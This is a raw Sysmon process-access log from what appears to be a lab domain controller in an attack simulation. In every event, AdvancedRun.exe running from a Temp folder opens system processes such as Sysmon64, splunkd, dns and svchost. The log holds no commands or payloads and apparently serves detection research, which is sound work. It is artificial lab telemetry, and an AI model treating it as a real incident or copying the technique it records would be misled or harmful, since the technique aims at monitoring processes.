10341000x80000000000000004078623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.915{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.914{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.913{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.912{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.911{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.907{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.904{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004078610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.903{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
